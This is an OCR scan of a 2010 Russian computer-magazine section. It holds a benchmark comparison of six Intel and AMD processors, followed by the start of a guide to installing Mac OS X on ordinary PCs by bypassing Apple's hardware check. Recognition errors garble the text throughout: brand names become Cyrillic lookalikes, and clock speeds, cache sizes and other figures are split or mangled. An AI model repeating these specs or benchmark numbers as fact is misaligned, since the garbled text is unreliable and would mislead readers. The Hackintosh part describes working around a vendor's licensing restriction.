1 І7 975 Ехігете 

О РНепот ЕФІіоп 



і і 

Іпіеі Соге 
І7 920 



Іпіеі Соге 
І5 750 



АМР АіНІоп 
11X4 620 



Х4 965 ВЕ 



Р РНепот 
► 940 ВЕ АМЕ 
II) 





гонки 

НА «КАМНЯХ» 

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ПРОЦЕССОРОВ РАЗЛИЧ- 
НОЙ АРХИТЕКТУРЫ ОТ ІИТЕІ. И АМР 



іпіеі ьо 
І7 920 



АМО РНепот 
11X4 965 ВЕ 



АМО 
РНепот 
11X4 940 ВЕ 



ПОКУПКА НОВОГО ПРОЦЕССОРА - ОЧЕНЬ ОТВЕТСТВЕННЫЙ ШАГ ДЕЛО ДАЖЕ НЕ В 
ВЫСОКОЙ СТОИМОСТИ БОЛЬШИНСТВА «КАМНЕЙ»: АРХИТЕКТУРЫ РАЗЛИЧНЫ И 
НЕСОВМЕСТИМЫ МЕЖДУ СОБОЙ, И ВЫБОР ТОЙ ИЛИ ИНОЙ ПЛАТФОРМЫ НЕИЗБЕЖНО 
ПОТЯНЕТ ЗА СОБОЙ, КАК СНЕЖНЫЙ КОМ, ЗАМЕНУ ДРУГИХ ВАЖНЫХ ЭЛЕМЕНТОВ, ТАКИХ 
КАК МАТЕРИНСКАЯ ПЛАТА И - В НЕКОТОРЫХ СЛУЧАЯХ - ПАМЯТЬ. ЕСЛИ ЖЕ ПОТОМ ТЫ 
РЕШИШЬ ПЕРЕЙТИ НА ДРУГУЮ АРХИТЕКТУРУ, ТО ВСЕ ЭТИ НЕМАЛЫЕ ЗАТРАТЫ ПРИДЕТСЯ 
ПОВТОРЯТЬ. В ОБЩЕМ, КАК НИ КРУТИ, ВЫБОР НЕПРОСТОЙ. НАДЕЕМСЯ, НАШ ОБЗОР ТЕБЕ 
В НЕМ ПОМОЖЕТ. 



МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Первая частьтестирования проходила на штат- 
ныхзначенияхтактовой частоты и напряжения. 
После этого для процессоров, которые нам уда- 
лось разогнать до одинаковой тактовой частоты 
3600 МГц (а не удалось это сдел ать только с АМЭ 
АіНІоп 11X4620], мы провелитотже набортестов 
на данной частоте. Последний тест был интере- 
сен тем, что должен был объективно показать 
производительность различных процессоров, 
работающих на одной и той же частоте. 
Собственно вычислительную мощность ис- 
пытуемых процессоров мы оценивали втесте 
ІЧисІеагМС, показывающем скорость процессора 
в арифметических задачах. Эффективность рабо- 
ты с оперативной памятью проверялась в наборе 
тестов Метогу ВепсНтагк, который входит в ши- 



роко известный пакет ЕѵегезС Встроенный бенч- 
марк в архиваторе ѴѴіп ВАР— также эффективное 
средство для оценки производительности СРІЭ и 
памяти; прогоняли мы и его. С целью выявления 
пригодности процессора для реальных ресурсо- 
емкихзадач использовалисьтесты СіпеЬепсЬ Р10 
(для измерения производительности в рендерен- 
ге трехмерной картинки] и ТМРО Епс4.0 — для ко- 
дирования видео. Последнее компрессировалось 
в формат МРЕО 1900x1 200, а в качестве источ- 
ника было взято некомпрессированное видео с 
видеокамеры формата ЕиІІНО 1920x1 080. ЗйМагк 
Ѵапіаде — популярный пакет для тестирования 
графической подсистемы. Поскольку видеокарта 
использовалась во всех тестах одна и та же, нам 
стало интересно, о кажет л и процессор сущест- 
венное влияние на результат. А для тестирования 
возможностей самого процессора в графичес- 



кихзадачахмы использовали тест из пакета 
ЗОМагк’Об СРІІ Эсоге. Разумеется, не обошли мы 
стороной и тестирование производительности в 
играх: были запущены бенчмарки для игр ЕагСгу 
2 (1280x1024, Шга Нідб, АЕ8х, ОігесіХІО) и Сгузіз 
ѴѴагГіеасІ (1280x1024, ЕпІбизіазІ, АЕ8х, ОігесіХЮ]. 



ТЕСТИРУЕМОЕ 

ОБОРУДОВАНИЕ: 

АМ0АТШШ 11X4 620 
АМО РНЕММ 11X4 940 ВЕ 
АМО РНЕММ 11X4 965 ВЕ 
ШТЕЬ СОРЕ 15 750 
ШЕЬ СОРЕ 17 920 

ІЫТЕІ. СОРЕ 17 975 ЕХТРЕМЕ Е0ІТІ0М 



► 016 



ХАКЕР 01 /133/ 10 





ѴШРАК 



АМОАіЫоп 11X4620 
АМОРИепот 11X4940 
АМй РНепот 11X4 965 
ІпІеІСогеі5750 
ІпІеІСогеі7920 
ІпІеІСогеі7975 




■ 3600 МГц ■ ОеТаиИ КБайт/с 



ВТЕСТЕ АРХИВИРОВАНИЯ ОЧЕНЬСИЛЬНО ВЫРЫВАЕТСЯ ВПЕРЕД 
ПАРА СТАРШИХ ПРОЦЕССОРОВ ШТЕІ. И НЕМНОГО ОТСТАЕТ МЛАД- 
ШИЙ УЧАСТНИК ТЕСТА ОТ АМй. ОСТАЛЬНЫЕ НЕ ДЕМОНСТРИРУЮТ 
СУЩЕСТВЕННЫХ РАЗЛИЧИЙ В ПРОИЗВОДИТЕЛЬНОСТИ 




ЛМО- АіЫоа'ЧІ 

АВХ620УРК426І 
ААбАС А б 0919ЕРАЫ 
9257949Р90264 

-/ ж 

Щ -АД АДА 



01РРУ5Е0 1 N (ЗЕЙ^АКѴ 
ИАВЕ ІИ М ДІ_ АЙ I А 



АМР АТНЮИ 
11X4620 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

РАЗЪЕМ: БОСКЕТ АМ2+/АМЗ 

АРХИТЕКТУРА: КІО 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 
ЧАСТОТА, ГГЦ: 2 6 
ШИНА, МГЦ: 2000 
КЭШ-ПАМЯТЬ І_3, МБАЙТ: 2 
ТИПИЧНЫЙ УРОВЕНЬ ТЕПЛОВЫДЕЛЕНИЯ (ЮР), ВТ: 95 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: 13 




ТЕСТОВЫЙ СТЕНД 

БЛОК ПИТАНИЯ. ВТ: 1050, ЕКЕРМАХ РЕѴОЮТІОН 
ЖЕСТКИЙ ДИСК, ГБ: 250, 55Р 0С2 ѴЕРТЕХ 250 ГБ 
ВИДЕОКАРТА: АМй РА0Е0И НО 5070 

ПЛАТФОРМА ІИТЕІ. ЗОСКЕТ 1366 
МАТЕРИНСКАЯ ПЛАТА: А5Ц5 Р6Т6 ѴѴ5 КЕѴ0ШТКЖ 
ОПЕРАТИВНАЯ ПАМЯТЬ: 00РЗ ЗХ 1 ГБ КШ68Ш 1333 МГЦ СІ.7 
1.5 В 

ПЛАТФОРМА ШТЕЬ ЗОСКЕТ 1156 
МАТЕРИНСКАЯ ПЛАТА: 0ІВАВѴТЕР55М-004 
ОПЕРАТИВНАЯ ПАМЯТЬ: 00РЗ 2Х 1 ГБ КШСЗТОИ 1333 МГЦ СІ.7 
1.5 В 

ПЛАТФОРМА АМО ЗОСКЕТ АМ2+ 

МАТЕРИНСКАЯ ПЛАТА: А5Ц5 М4А79 РЕШХЕ 
ОПЕРАТИВНАЯ ПАМЯТЬ: 00Р2 2Х 1 ГБ КШ63Ш НѴРЕРХ 1066 
МГЦ СЬ5 2.2 В 




АМОРНЕИОМ 
11X4 940 ВЕ 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

РАЗЪЕМ: БОСКЕТ АМ2+/АМЗ 

АРХИТЕКТУРА: КІО 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ:45 
ЧАСТОТА, ГГЦ: 3,0 
ШИНА, МГЦ: 1800 
КЭШ-ПАМЯТЬ І_3р МБАЙТ: 6 
ТИПИЧНЫЙУРОВЕНЬТЕПЛОВЫДЕЛЕНИЯ (ТОР), ВТ: 125 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: СВОБОДНЫЙ 

■■■■■■■■□□ 




+ 

Из-за низкой цены этот процессор можно посоветовать для использо- 
вания в различных бюджетных системах — таких, какофисные рабочие 
станции, или системы для дома начального уровня. Еще один плюс 
— низкий уровень тепловыделен ия: греется он слабее, чем первые 
РЬепот’ы. 

Производительность потеперешним меркам крайне низка. Крометого, 
отсутствие свободного множителя не позволяет сколько-нибудь сущест- 
венно повысить ее с помощью разгона. 



+ 

В разогнанном состоянии в большинстве тестов процессор почти 
догоняетАМБ РЬепот 11X4 965 ВЕ, который старше и дороже. Поэто- 
му данную модель можно порекомендовать фанатам-оверклокерам с 
небольшим бюджетом. Свободный множитель и «выносливость» про- 
цессора при высокой температуре да ют возможность, имея серьезную 
систему охлаждения (правда, уже не воздушную), разгонять его вдвое 
по сравнению с номинальнойтактовой частотой. Но и просто схорошим 
кулером из него можно выжать немало. 

Несмотря на температурную «выносливость», уровеньтепловыделения у 
модели довольно большой —требуется серьезное охлаждение. 
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РЕВКІІМ 




СТРАННЫЙ РЕЗУЛЬТАТ [ВПЕРЕД ВЫРЫВАЕТСЯ МЛАДШАЯ 
МОДЕЛЬ ІЫТЕЬ СОРЕ І5 750 В РАЗОГНАННОМ СОСТОЯНИИ) ОБЪ- 
ЯСНЯЕТСЯ ТЕМ , ЧТО ЗДЕСЬ ЗА СЧЕТ МЕНЬШЕГО МНОЖИТЕЛЯ 
ПРИШЛОСЬ ВЫСТАВИТЬ БОЛЬШУЮ ЧАСТОТУ ШИНЫ — ВОТ И ВСЕ. 
В ЦЕЛОМ ЖЕ, ПРОЦЕССОРЫ ІЫТЕЬ ИДУТ ВПЕРЕДИ С СУЩЕСТВЕН- 
НЫМ ОТРЫВОМ 



ПРОЦЕССОР МАЛО ПОВЛИЯЛ НА РЕЗУЛЬТАТЫ ТЕСТА: «ПОГОДУ» 
ДЕЛАЕТ ВИДЕОКАРТА. ТЕМ НЕ МЕНЕЕ, МЛАДШИЕ МОДЕЛИ ОТ 
ІІМТЕІ. И АМО (АМО АТНЮМ II Х4 620 И ШТЕЬ СОРЕ І5 750 ) ЧУТЬ-ЧУТЬ 
ОТСТАЛИ ОТ ОСТАЛЬНЫХ 




РАЗЪЕМ: БОСКЕТ АМ2+/АМЗ 

АРХИТЕКТУРА: КІО 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ: 45 
ЧАСТОТА, ГГЦ: 3 4 
ШИНА, МГЦ: 1800 
КЭШ-ПАМЯТЬ І_3, МБАЙТ: 6 

ТИПИЧНЫЙУРОВЕНЬТЕПЛОВЫДЕЛЕНИЯ (ТОР), ВТ: 145 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: СВОБОДНЫЙ 

■■■■■■■■■□ 

+ 

Старшая модельотАМБ из принявшихучастие в нашемтесте. Без 
разгона демонстрирует неплохую производительность, а стоит при этом 
весьма скромно. 

Л ишь в некоторых из тестов процессор обгоняет самого младше- 
го участника нашего тестирования от Іпіеі. Разогнанный более 
дешевый АМБ РЬепот II Х4 940 ВЕ практически ничем не уступил 
старшей модели ни в производительности, ни в стабильности. Более 
того, АМБ РЬепот II Х4 965 ВЕ сильнее греется, так что серьезно 
разогнать этот «камень» относительно номинальной частоты может 
и не получиться. 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

РАЗЪЕМ: БОСКЕТ 11 56 

АРХИТЕКТУРА: ЫУ N N Р I Е Б Б 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ:45 
ЧАСТОТА, ГГЦ: 2 66 
ШИНА, ГБИТ/С: 2 5 
КЭШ-ПАМЯТЬ І_3, М БАЙТ: 8 

ТИПИЧНЫЙУРОВЕНЬТЕПЛОВЫДЕЛЕНИЯ (ТОР), ВТ: 95 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: 21 (МАКСИМУМ - 24) 

■■■■■■■□□□ 

+ 

Недорогой (если сравниватьс другими изделиями от I пЕеІ) процессор, 
показавший, тем не менее, неплохие результаты. Отставание во многих 
тестах от старших собратьев было весьма существенным, но все равно 
производительность оказалась где-то на уровне старших моделей АМБ. 

В отличие от флагманских моделей Іпіеі, у этого процессора отсутствует 
поддержка Нурег-ТЬ геасі іпд . Удивительно, но в тестах ЕагСгу2 и Сгузіз 
ѴѴа гЬеасІ , где влияние процессора на производительность вообще мини- 
мально, Іпіеі Соге І5 750 заметно уступ ил двум участникам отАМБ и занял 
предпоследнее место. Не сильно лучше результат и вЗБМагкСРІІ Бсоге. 



► 018 
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КОДИРОВАНИЕ ВИДЕО 



АМйАШІоп 11X4620 
АМР РИе пот 11X4940 
АМй РНепот 11X4 965 
ІпІеІСогеІ5750 
Іпіеі Соге І 7 920 
Іпіеі Соге І 7 975 

■ 3600 МГц ■ Оеіаиіі 



0.5 1 1,5 

время, с 



2 2,5 3 3,5 4 4,5 



МСІ-ЕАКМС 



АМРАІЫоп 11X4 620 
АМО РЬепот 11X4 940 
АМй РЬепот 11X4 965 
Іпіеі Соге І5 750 
Іпіеі Соге І 7 920 
Іпіеі Соге І 7 975 



О 5000 10000 15000 20000 25000 30000 



3600 МГц 



Оеіаиіі 



И ЗДЕСЬ РЕЗУЛЬТАТЫ ОКАЗАЛ ИСЬ ДОВОЛЬНО ПРЕДСКАЗУЕМЫ- 
МИ: ВПЕРЕД ВЫРЫВАЮТСЯ ТОПОВЫЕ МОДЕЛИ ОТ ШТЕІ_, А АМО 
СУЩЕСТВЕННО ОТСТАЕТ 



ВЫЧИСЛЕНИЯ УЧАСТНИКАМ ТЕСТИРОВАНИЯ ОТ ШТЕЬ ДАЮТСЯ 
ЯВНО ЛУЧШЕ. В РАЗОГНАННОМ СОСТОЯНИИ АМО РНЕЫОМ 11X4940 
ВЕ И АМО РНЕИОМ II Х4 9б5 ВЕ ВЫДАЮТ ПРАКТИЧЕСКИ ИДЕНТИЧ- 
НЫЕ РЕЗУЛЬТАТЫ. ТО ЖЕ КАСАЕТСЯ И ПАРЫ ІЫТЕЬ СОКЕ І7 920 И 
ІЫТЕЬСОКЕ 17975 ЕХТКЕМЕ ЕРІТІОЫ 




ШТЕШКЕ 
І7 920 




ШТЕШКЕ 
і7 975 Ехігете Есііііоп 



■ 38200 руб. 1 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

РАЗЪЕМ: БОСКЕТ 1366 

АРХИТЕКТУРА: ІЧЕНАБЕМ 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ:45 
ЧАСТОТА, ГГЦ: 2 66 
ШИНА, ГБИТ/С: 4 8 
КЭШ-ПАМЯТЬ 1_3, МБАЙТ: 8 

ТИПИЧНЫЙУРОВЕНЬТЕПЛОВЫДЕЛЕНИЯ (ТОР), ВТ: 130 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: 20 (МАКСИМУМ — 21 ] 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

РАЗЪЕМ: БОСКЕТ 1366 

АРХИТЕКТУРА: ІЧЕНАБЕМ 
ТЕХНИЧЕСКИЙ ПРОЦЕСС, НМ:45 
ЧАСТОТА, ГГЦ: 3 33 
ШИНА, ГБИТ/С: 6 4 
КЭШ-ПАМЯТЬ 1_3, МБАЙТ: 8 

ТИПИЧНЫЙУРОВЕНЬТЕПЛОВЫДЕЛЕНИЯ (ТОР), ВТ: 130 
КОЛИЧЕСТВО ЯДЕР: 4 
МНОЖИТЕЛЬ: СВОБОДНЫЙ 



□ 



+ 

Процессор, основанный на архитектуре ІЧеЬаІет, в абсолютном боль- 
шинстветестов показал прекрасную производительность, существенно 
обогнав и участников отАМБ, и своего младшего собрата. А стоит денег 
хоть и не очень маленьких, но вполне разумных. В разогнанном же 
состоянии он практически неуступил старшему (и почти вчетверо более 
дорогому!) собрату — ІпІеІСоге І7 975 Ехігете ЕбШоп. 

Модель не назовешь подходящей для экстремальных «гонщиков»: 
максимальный множитель21 накладываетограничения на разгонный 
потенциал. 



+ 

Флагман от I пііеі вышел абсолютным победителем практически из всех 
тестов, продемонстрировав рекордную производительность. Ему мы и 
присуждаем награду «Выбор редакции». 

Безусловно, покупать лишь процессор по цене компьютера (не самого, 
кстати, медленного) могут позволить себетолько очень состоятельные 
пользователи, которых интересует не соотношение «цена/качество», 
а все только самое-самое. Тем более, разница в производительности с 
младшим I піеі Соге І7 920 оказалась нетакой уж существенной. 



ВЫВОДЫ 

Они, в общем-то, очевидны. При наличии 
совсем небольшого количества денег сегод- 
ня на базе АМБ можно собрать более шуструю 
конфигурацию, чем на Іпіеі. Ноуже модели от 



I пііеі среднего ценового диапазона обгоняют 
самые старшие модели отАМБ. Так что выбор 
для действительно мощной системы, когда 
финансовые затраты не столь важны — одно- 
значно Іпіеі, а нам лишь остается ждать, пока 
АМБ выпустит более быстрые процессоры. 



Награду «Лучшая покупка» получает процес- 
сор АМБ РЬепот II Х4 940 ВЕ, показавший 
хорошую производительность при мини- 
мальных затратах, а «Выбор редакции» при- 
суждается флагману линейки процессоров 
I пііеі — Соге І7 975 Ехігете ЕсПЬоп.^с 
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НТО НАМ СТОИТ 
МАС ПОСТРОИТЬ? 



УСТАНАВЛИВАЕМ МАКОС НА ОБЫЧНЫЙ 
КОМПЬЮТЕР 



СЛОЖНО НЕ ЗАМЕТИТЬ ЛЮБОВЬ РАЗРАБОТЧИКОВ И ДИЗАЙНЕРОВ К ПРОДУКЦИИ МАС. СТОИТ 
ТОЛЬКО ОТКРЫТЬ ФОТОГРАФИИ ИЗ ОФИСОВ УСПЕШНЫХ ІТ-КОМПАНИЙ И СТАРТАПОВ... ВОЗ- 
НИКАЕТ ЖЕЛАНИЕ ПОПРОБОВАТЬ ХВАЛЕНУЮ СИСТЕМУ САМОМУ, НО СЕРЬЕЗНЫЙ ЦЕННИК ТУТ 
ЖЕ ОСТУЖАЕТ ПЫЛ. ОДНАКО ВЫХОД ЕСТЬ! 



К омпьютеры Арріе МасіпІюзЬ всегда 
были элитными и в нашей стране 
скорее представляют собой экзотику. 
Люди либо ничего про них не знают, 
либо восхищаются их красотой и 
удобством. Даже среди тех, кто все-таки знает, 
что это, многие не могут себе позволить такой 
компьютер, в первую очередь из-за стоимости. 
Еще больший аргумент против — якобы боль- 
шие проблемы с программным обеспечением 
в России. 

Впрочем, некоторые компании стали про- 
давать так называемые клоны системы, 
собранные на самом обычном железе, но при 
этом — с предустановленной МасОЗХ. Такая 
система практически неотличима от ориги- 
нальной, на ней можно запускать любые про- 
граммы и даже обновлять ее в онлайне. Мы 
решили разобраться, как им такое удалось и 
как собирается хакинтош. А заодно — какие 
отличия имеются с оригинальной фирменной 
системой. 

Итак, устанавливаем на домашний РС, 
наряду с ѴѴіпсІоѵѵз, еще и МасОЗ (ХакОС) 
в пробных целях. В любой момент можно 
вернуться в привычную среду (и как там 
становится тоскливо после такого праздни- 
ка жизни!]. 



ВЫБОР КОНФИГУРАЦИИ 

На какое железо реально поставить МакОС? 
Не на любое! 

1. ПРОЦЕССОР. 

Оптимальным выбором будет I пЕеІ Соге 2 
Рио, но от Интел подойдут и Соге Рио, Соге 
Зоіо (ѴопаЫ, Соге 2 ОиасІ, Хеоп, Репбит М 
(новой серии], Соге І5, і 7, Аіот. Важно, чтобы 
они поддерживали набор инструкций 55ЕЗ; 
впрочем, с процессорами 55Е2 (Репбит М 
(старый), Репбит 4] тоже реально, но с опре- 
деленными проблемами. Аналогично можно 
попытаться поставить систему на АМР, но — 
используя специальное ядро, созданное для 
этих целей. Насчет Атома возникли новые 
сложности, впрочем, уже преодолеваемые 
хакинтош -сообществом. 

2. СИСТЕМНАЯ ПЛАТА. 

На оригинальных Маках используются чип- 
сеты I пііеі и пЕогсе. Есть сведения о простой 
установке на чипсеты I піеі 945, 975х, 965Р, 
ЕР31, ЕР45 и другие. Более важно понятие 
южного моста: I СН 7,8, 1 0 поддерживаются 
оригинальными драйверами, ІСН9 требует 
некоторых патчей, МСР79 тоже относится 
к родным мостам. Перечислить, какие есть 
платы на рынке с такими же чипсетами, 
нереально, да и сопоставить модель мате- 



ринской платы с используемым южным 
мостом — тоже непростая задача. По произ- 
водителям можно утверждать, что популяр- 
ные АЗИЗ и ОідаЬуіе для этих целей вполне 
пригодны. Нужно понимать, что другие чип- 
сеты пЕогсе, ѴІА, 515, АМБ/АТІ использовать 
скорее нельзя, чем можно, хотя есть и такие 
работающие хакинтоши. 

3. ПАМЯТЬ. 

Ничего особого. Если у тебя работает ѴѴіпсІоѵѵзХР, 
то МасОЗХтем более будет работать. 

4. ЖЕСТКИЙ ДИСК. 

Опять же, ничего необычного. 
Предпочтительнее с интерфейсом 5АТА, хотя 
и старый ЮЕ-интерфейс вполне пригоден. 
Размер — современный: 10 Гб достаточно 
для установки системы, которая еще займет 
место для виртуальной памяти, для файла 
гибернации и собственных кешей, но всегда 
хочется чего-то большего, и программ поста- 
вить, и музыки, и фильмов... Модель значе- 
ния не имеет. 

5. ВИДЕОКАРТА. 

Принципиально, что драйвера для видеокарт 
существуют только для современных ІЧѵісІіа, 
АТІ и Іпіеі. И то не все модели. ѴІА СЬготе, 
515, Маіхох и большинство устаревших карт 
шансов не имеют. Более старые модели воз- 



► 020 
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можно использовать с МасОЗХ Тідег, а для 
современной Зпоѵѵ Беорагб перечень прибли- 
зительно таков: 

• ІЧѵібіа Сергее 7x00-9x00, ОТ120 - ОТ295 (х 
не меньше 3) 

• АТІ Вабеоп Х1300, Х1600, Х1900, Н02400, 

Н 02600, Н 03800, Н 04500, Н04600, Н04800. 

• Іпіеі СМА950, Х3100 — версии для мобиль- 
ных компьютеров. 

• Мобильные версии пѴібіа и АТІ — очень 
большие проблемы. 

6. ЗВУКОВАЯ КАРТА. 

Для устаревшего стандарта АС 9 7 есть драй- 
вер, подходящий для большинства карт 
производства Реаііек и Апаіод Беѵісез. Для 
нового стандарта НБА (НідЬ Веііпіііоп Аибіо] 
есть варианты практически для всех встроен- 
ных карт. А вот с РСІ-картами нужно выяснять 
индивидуально. 

7. СЕТЕВОЙ АДАПТЕР. 

Практически любые на чипах Реаііек или 
Магѵеіі, несколько сложнее — с Іпіеі и ЗСот, 
также есть драйвера на некоторые карты 
Вгоабсот (440х, 5701]. Приходится оговари- 
ваться, ибо есть проблемы с модификациями, 
например, Магѵеіі 8071 или Іпіеі 82567. А уси- 
лиями хак-сообщества созданы драйвера под 
некоторые модификации пРогсеІ_АІ\І. 

8. ѴѴІГІ-АДАПТЕР. 

Вопрос актуален для владельцев ноутбу- 
ков. Работают адаптеры на чипах Аібегоз 



и Вгоабсот. Ниже по тексту будет пример 
оживления адаптера Вгоабсот 4315. 

9. иЗВ-УСТРОЙСТВА. 

Видеокамера, блютус, ТВ-тюнер, флеш- 
накопитель, ѴѴіРі, принтер, сканер, клавиатура 
и мышь работают практически все. 

10. ОѴО-КѴѴ ПРИВОД. 

Тоже работают практически все, как с интер- 
фейсом 5АТА, так и с АТА. Но последний вызо- 
вет некоторые проблемы при инсталляции. 
Подводя черту под этим обзором, следует 
сказать, что всегда есть риск, что какое-то 
устройство в системе окажется неподдер- 
живаемым. Ты можешь поискать решение 
в интернете, либо смириться, мол, пробуя 
МакОС, и не рассчитывал, что оно понадо- 
бится. 

Видеокарта, даже если она не поддержива- 
ется, все равно будет показывать изображе- 
ние в одном из стандартных режимов ѴЕ5А, 
например, 1024x768, но отсутствие поддержки 
ОрепСБ ограничит тебя в списке программ, 
которые можно использовать. К примеру, не 
будут запускаться системные шахматы и БѴВ- 
ріауег. 

Итак, в пробной конфигурации мы выбрали 
десктоп на основе системной платы бідабуіе 
ЕР45-Ш31_П с процессором Іпіеі Соге 20ио 
Е7400, память 2x1 Гб, звуковая карта встро- 
енная Веаііек АБС888, сетевой адаптер 
Веаііек 8168, видеокарта Раііі Сеіогсе 96006Т, 



жесткий диск 5АТА 250 Гб, ОѴО-РѴѴ Орііагс. В 
целом — современный середнячок эконом- 
класса. 

ВЫБОР ОПЕРАЦИОННОЙ СИСТЕМЫ 

На Интел-совместимых компьютерах можно 
запустить МасОЗХ 10.4.x Тідег, МасОЗХ 10.5.x 
Ееорагб и новейшую МасОЗХ 10.6.x Зпоѵѵ 
Ееорагб. Разумеется, предпочесть стоит 
последнюю, но при ЭТОМ: 

1. Видеокарты Рабеоп 7500 — 9700 возможно 
полноценно запустить только в Тигре. 

2. Видеокарты пѴібіа Сеіогсе 5x00 — 6x00 еще 
возможно запустить в Леопарде. 

3. Снежный Барс пока не является хорошо 
отлаженной стабильной системой. 

Внешние различия между системами не столь 
и велики, да и совместимость с программным 
обеспечением не является решающим аргу- 
ментом: все работает в Леопарде, и многое 

— в Тигре. С другой стороны, очень совре- 
менным компьютерам может подойти только 
очень современная система, опять таки из-за 
драйверов. 

Вместе с развитием операционной системы 
трудилось и хак-сообщество, обеспечивая 
совместимость ОС со стандартными компью- 
терами. Так, для установки Тигра требовалось 
подменять ядро системы и ряд жизненно важ- 
ных программ на модифицированные версии. 
В Леопарде появилось понятие ванильного 
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ЗАГРУЗЧИК СНАМЕІ_Е0Ы-2 

ядра, т.е. оригинальное ядро от самой Эппл. 
Система стала родной, немодифицированной, 
только с небольшими добавками. В Снежном 
Барсе количество необходимых добавок 
убавилось, ниже мы расскажем, почему. 
Впрочем, эти трюки применимы и к Леопарду, 
просто они разработаны уже с выходом 
системы 10.6. По каждой из этих версий тре- 
буется отдельный рассказ, но речь пойдет 
только про последнюю, самую современную 
версию операционной системы с названием 
Эпоѵѵ Беорагб (он же Барсик]. 

ВЫБОР ДИСТРИБУТИВА 

Оригинальные компьютеры Арріе Масіпіозб 
комплектуются дисками с операционной 
системой, однако эти диски являются 
модельно-зависимыми, и, стало быть, непри- 
годны для наших целей. Пригодным будет 
диске пометкой РеТаіі, который является 
общим для всех моделей. Просто поставить с 
него систему на хакинтош не удастся, потому 
что он также рассчитан на оригинальный 
компьютер. В отличие от МісгозоЛ ѴѴіпсІоѵѵз, 
Арріе МасОЭХ не требует ввода серийного 
номера и активации, подразумевается, что 
подлинность компьютера заложена в нем 
самом. В компьютерах Арріе модель и серий- 
ный номер, а также свойства установленных 
устройств (аудио, видео и других] заложены 
в ЕРІ ( ЬЛрУ/еп.ѵѵікіресІіа.огд/ѵѵікі/ЕхІепзіЬІе 
Гігтѵѵаге ІпІеНасе ). в отличие от БИОСа 
большинства наших компьютеров. Некоторые 
файлы в системе зашифрованы, и ключ шиф- 
рования заложен в специальной микросхеме. 
Отсюда легко сделать вывод: для установки 
системы МасОЭХ на неоригинальный ком- 
пьютер, эту защиту следует обходить еще на 
старте установки системы, т.е. старт должен 
быть с другого источника. 



Вариант: переделать сам установочный диск, 
чтобы он содержал в себе обход этой защиты, 
да еще и набор дополнительных драйверов, 
чтобы систему можно было поставить на 
более широкий круг компьютеров. Такой диск 
называется сборкой, и есть люди, которые 
их производят, возможно, и в коммерческих 
целях, а чаще за просьбу о пожертвовании. В 
чем минусы? Поскольку сборку делали не мы 
сами, то не знаем, что конкретно там изме- 
нено, и остается только верить, что исправ- 
ления нужные и безопасные. Возможны 
изменения внешнего вида и логотипов — 
дескать, система неоригинальная и будьте 
добры видеть логотип создателя сборки. Не 
очень корректно, все же, сама система созда- 
на компанией Арріе и ее стоит уважать. Для 
подобных случаев существует пакет РезІоге_ 
□е5кІор_5еІІіпд5, который нетрудно найти в 
интернете и с ним вернуть оригинальный вид 
оболочки. Еще один минус — версия систе- 
мы. Сборки чаще всего имеют устаревшую 
версию. Впрочем, если постараться (о чем 
рассказано ниже), можно подправить систему 
таким образом, что ее реально будет апдей- 
тить официальными пакетами от Арріе. Плюс 
же сборки очевиден: установить систему 
получится за 10-20 минут, даже не имея ника- 
кого опыта в хакинтошестроении. Установка 
Ритейла потребует немалых усилий и знаний. 
Вкратце путь таков: скачать из Сети образ 
загрузочного диска или флеш-накопителя, 
содержащего минимальную ОС с минималь- 
ным набором драйверов, загрузиться с него в 
режим командной строки, вставить в привод 
БѴБ инсталляционный диск Ритейл, смонти- 
ровать его и запустить с него инсталляцию. 
Широкое хождение имеет сборка 10 А 432 от 
сіа п 1 234, которая представляет собой тот же 
дистрибутив Ритейл, но с нужным загрузчи- 



ком, инсталляционным скриптом и набором 
драйверов. Выбрав эту сборку, ты можешь 
стартовать прямо с нее и иметь тот же 
результат с меньшим количеством усилий. 

ПРОЦЕСС ИНСТАЛЛЯЦИИ 

Может быть, на твоем компьютере уже стоит 
система ѴѴіпсІоѵѵз, и ты не хочешь ее уничто- 
жать, а может быть, ты планируешь ее только 
поставить. В этом случае начинать следует 
с нее. Во-первых, МакОС требует, чтобы 
ЭАТА-вин честер работал в режиме АНСІ. Для 
южного моста ІСН7 этого не требуется, а вот 
для других — более чем желательно. И если 
для ѴѴіпсІоѵѵз Ѵізіа в этом нет проблемы, то 
для ѴѴіпсІоѵѵз ХР не все так гладко. Сам дис- 
трибутив ѴѴіпсІоѵѵз ХР 5Р2 не содержит драй- 
вера АНСІ и не пожелает устанавливаться 
на НББ в таком режиме, а после установки 
системы драйвер ПАЮ/АНСІ не хочет прини- 
маться системой, потому что такое устройство 
не включено в БИОСе. Попытка же вклю- 
чения в БИОСе режима приводит к синему 
экрану при загрузке ХР. Тупик?! Для южного 
моста ІСН8 существует корректный инстал- 
лятор драйвера, — ищи на прилагаемом 
диске, его также можно модифицировать для 
инсталляции на ІСН9 путем редактирования 
іпі-файла, заменой 2829 на 2929 . Для других 
вариантов придется искать другие пути. 

Что ж, с этой проблемой ты справился, и 
ѴѴіпсІоѵѵз у тебя работает с винчестером 
в режиме АНСІ. Преимущество скорости 
очевидно. Менее очевидно, но для нас 
важнее — совместимость с МакОС. Теперь 
следует выделить раздел для установки 
05Х. Раздел должен быть первичным, а не 
логическим диском в расширенном разделе! 
Простейший способ: щелкнуть правой кла- 
вишей мыши по значку «Мой компьютер», 
выбрать «Управление» А «Накопители» и 
произвести стандартные действия по созда- 
нию нового первичного раздела в формате 
ЕАТ32. Если это невозможно, то можно вос- 
пользоваться одной из программ управления 
